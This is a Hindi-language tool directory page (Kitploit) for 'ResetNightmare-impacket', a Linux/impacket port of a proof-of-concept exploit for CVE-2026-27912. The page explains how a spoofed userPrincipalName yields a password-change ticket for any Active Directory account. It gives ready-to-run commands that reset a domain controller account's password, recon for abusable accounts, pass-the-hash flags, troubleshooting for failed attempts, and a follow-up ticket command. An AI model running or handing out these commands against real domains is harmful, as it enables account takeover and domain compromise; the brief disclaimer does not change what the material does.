Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ResetNightmare-impacket — CVE-2026-27912 (ResetNightmare) — Semperis Community के Invoke-ResetNightmare PoC का Linux/impacket पोर्ट | Kitploit
उपकरण/GitHubGitHub/mihat2/resetnightmare-impacket
पासवर्ड हमलेभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubmihat2/resetnightmare-impacket

ResetNightmare-impacket

CVE-2026-27912 (ResetNightmare) — Semperis Community के Invoke-ResetNightmare PoC का Linux/impacket पोर्ट

रिपॉजिटरी देखें
138 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ResetNightmare — CVE-2026-27912

Linux / impacket टूलिंग CVE-2026-27912 ("ResetNightmare") के लिए। यह लक्षित Active Directory खाते का पासवर्ड रीसेट करता है, NT_ENTERPRISE प्रिंसिपल के लिए kadmin/changepw TGT का अनुरोध करके — जिसका नाम लक्ष्य का sAMAccountName होता है — ऐसे खाते (UPNUser) का उपयोग करके जिस पर हम नकली userPrincipalName लिख सकते हैं।

Semperis Community Invoke-ResetNightmare PowerShell टूल का Python पोर्ट (देखें श्रेय)।

⚠️ कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए। यह टूल वास्तविक Active Directory क्रेडेंशियल बदलता है और खातों को लॉक कर सकता है।

  • इसे केवल उन्हीं सिस्टम पर चलाएँ जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति है (हस्ताक्षरित अनुबंध या आपके नियंत्रण वाली प्रयोगशाला)।
  • कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है (जैसे US CFAA, UK Computer Misuse Act, और समकक्ष कानून) और इसके आपराधिक व नागरिक दंड हो सकते हैं।
  • लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते। सॉफ़्टवेयर "AS IS" प्रदान किया गया है — देखें LICENSE। यदि आपके पास अनुमति नहीं है, तो इसे न चलाएँ।

यह कैसे काम करता है

  1. (वैकल्पिक) UPNUser बनाएँ, स्वयं को GenericAll अनुदान दें, उसका पासवर्ड सेट करें, उसे सक्षम करें।
  2. लक्ष्य का sAMAccountName पता करें।
  3. UPNUser.userPrincipalName = <targetSAN> सेट करें (नकली UPN)।
  4. NT_ENTERPRISE '<targetSAN>' के रूप में kadmin/changepw के लिए AS-REQ करें — KDC एंटरप्राइज़ UPN को लक्ष्य पर मैप करता है और उसके लिए पासवर्ड-परिवर्तन TGT जारी करता है।
  5. नकली UPN हटाएँ।
  6. उस TGT के साथ kpasswd पासवर्ड-परिवर्तन → लक्ष्य का पासवर्ड सेट करता है।
  7. UPNUser का मूल UPN पुनर्स्थापित करें।

इंस्टॉलेशन

root@kitploit:~
python3 -m venv venv
./venv/bin/pip install -r requirements.txt

उपयोग

ऑपरेटर क्रेडेंशियल पहला पोज़िशनल तर्क है: [domain/]username[:password]। कोई भी पासवर्ड छोड़ा जा सकता है और उसके लिए आपसे पूछा जाएगा।

रीकॉन — यह खाता किसका दुरुपयोग कर सकता है? उन खातों की रिपोर्ट करता है जिन पर आप UPN लिख सकते हैं, वे OU जिनमें आप ऑब्जेक्ट बना सकते हैं, और MachineAccountQuota, सुझाए गए कमांड के साथ:

root@kitploit:~
./venv/bin/python resetnightmare.py 'CORP.LOCAL/operator:Passw0rd!' \
  --dc-ip 10.0.0.10 --find

किसी लक्ष्य को रीसेट करें ऐसे खाते का उपयोग करके जिस पर आप UPN लिख सकते हैं:

root@kitploit:~
./venv/bin/python resetnightmare.py 'CORP.LOCAL/operator:Passw0rd!' \
  --dc-ip 10.0.0.10 \
  --upn-user svc_web --upn-user-password 'Svc#2026' \
  --target-account 'dc01$' \
  --target-new-password 'N3wPassw0rd!'

पहले UPN खाता बनाएँ (OU पर Create Child अधिकार और LDAPS की आवश्यकता है):

root@kitploit:~
./venv/bin/python resetnightmare.py 'CORP.LOCAL/operator:Passw0rd!' \
  --dc-ip 10.0.0.10 \
  --create-new-path 'OU=Staging,OU=Corp,DC=corp,DC=local' \
  --upn-user pwned_user --upn-user-password 'Cr34ted#2026' \
  --target-account 'dc01$' \
  --target-new-password 'N3wPassw0rd!'

विस्तृत AS-REQ / LDAP / kpasswd लॉगिंग के लिए -debug जोड़ें।

फ़्लैग

पासवर्ड छोड़े जाने पर इंटरैक्टिव रूप से पूछे जाते हैं।

समस्या निवारण

--create-new-path विफलताएँ:

नोट:

  • LDAPS डिफ़ॉल्ट रूप से चालू है। AD केवल TLS पर unicodePwd लिखना स्वीकार करता है, इसलिए --create-new-path को इसकी आवश्यकता है। --no-ssl का उपयोग केवल रीड/केवल-UPN पथों के लिए करें।
  • --find केवल आपको या आपके समूहों को दिए गए allow ACEs की रिपोर्ट करता है (ऑब्जेक्ट स्वामित्व और MachineAccountQuota सहित); deny ACEs और क्रॉस-डोमेन सदस्यताओं का पूरी तरह मूल्यांकन नहीं किया जाता। खाली परिणाम यह प्रमाण नहीं है कि कोई पथ नहीं है — उपयोग से पहले सत्यापित करें।

सफलता के बाद

टूल लक्ष्य के रूप में उपयोग योग्य टिकट प्राप्त करने के लिए एक अनुवर्ती कमांड प्रिंट करता है:

root@kitploit:~
getTGT.py -dc-ip 10.0.0.10 'CORP.LOCAL/dc01$:N3wPassw0rd!'

श्रेय

  • Semperis Community — ResetNightmare — मूल शोध और Invoke-ResetNightmare PowerShell टूल जिसका यह प्रोजेक्ट पोर्ट है।
  • impacket — Kerberos और ldaptypes प्रिमिटिव।
  • ldap3 — LDAP क्लाइंट।

यह एक स्वतंत्र सामुदायिक पोर्ट है; Semperis से संबद्ध नहीं है और न ही उसके द्वारा समर्थित है।

लाइसेंस

MIT © 2026 mihat2.

टूल डाउनलोड करें
फ़्लैगअर्थ
<positional>ऑपरेटर क्रेडेंशियल: [domain/]username[:password]
--target-accountरीसेट करने के लिए sAMAccountName (कंप्यूटर खाते $ पर समाप्त होते हैं)
--target-new-passwordलक्ष्य पर सेट करने के लिए नया पासवर्ड
--upn-userजिस खाते पर नकली UPN लिखना है (या --create-new-path से बनाना है)
--upn-user-password--upn-user का स्पष्ट-पाठ पासवर्ड
--computer--upn-user को मशीन खाते के रूप में मानें
--create-new-path <DN>वह OU/कंटेनर जिसमें पहले --upn-user बनाना है (LDAPS की आवश्यकता है)
--findरीकॉन: दुरुपयोग योग्य खातों/OUs + सुझाए गए कमांड की रिपोर्ट करें, फिर बाहर निकलें
--list-ousOUs/कंटेनर सूचीबद्ध करें और बाहर निकलें (कोई मान्य --create-new-path चुनें)
--aes-key <hex>पासवर्ड के बजाय AS-REQ के लिए --upn-user की AES कुंजी
--upn-user-hash <NT>पासवर्ड के बजाय AS-REQ के लिए --upn-user का NT हैश (या LM:NT)
-k, --kerberosKerberos (SASL/GSSAPI) LDAP बाइंड (KRB5CCNAME का उपयोग करता है)
-H LM:NTपास-द-हैश LDAP (NTLM) बाइंड
--no-passपासवर्ड के लिए संकेत न दें (-k / KRB5CCNAME उपयोग करें)
--dc-hostDC होस्टनाम/FQDN (Kerberos SPNs के लिए)
--dc-ipDC IP पता
--no-sslसादा LDAP/389 (--create-new-path के साथ असंगत)
--supported-encryptionपसंदीदा एन्क्रिप्शन प्रकार, सूचनात्मक (डिफ़ॉल्ट aes256)
-debugविस्तृत लॉगिंग
लक्षणकारणसमाधान
result 50, insufficientAccessRightsOU मौजूद है लेकिन आपके पास उस पर Create Child अधिकार नहीं है।ऐसा OU उपयोग करें जिसमें आप लिख सकते हैं (--list-ous / --find), या --create-new-path हटाएँ और --upn-user के माध्यम से किसी मौजूदा खाते का दुरुपयोग करें।
result 32, noSuchObject — best match: DC=corp,DC=localDN की पैरेंट श्रृंखला मौजूद नहीं है (आंशिक/अनुमानित DN)।--list-ous से गणना करें और पूरा नेस्टेड DN चिपकाएँ। OUs नेस्टेड होते हैं; अकेला नाम उनका पथ नहीं है।
result 53, unwillingToPerform पासवर्ड चरण परगैर-TLS चैनल पर unicodePwd लिखना, या नीति के विपरीत कमज़ोर पासवर्ड।LDAPS बनाए रखें (--no-ssl न दें); अनुरूप पासवर्ड उपयोग करें।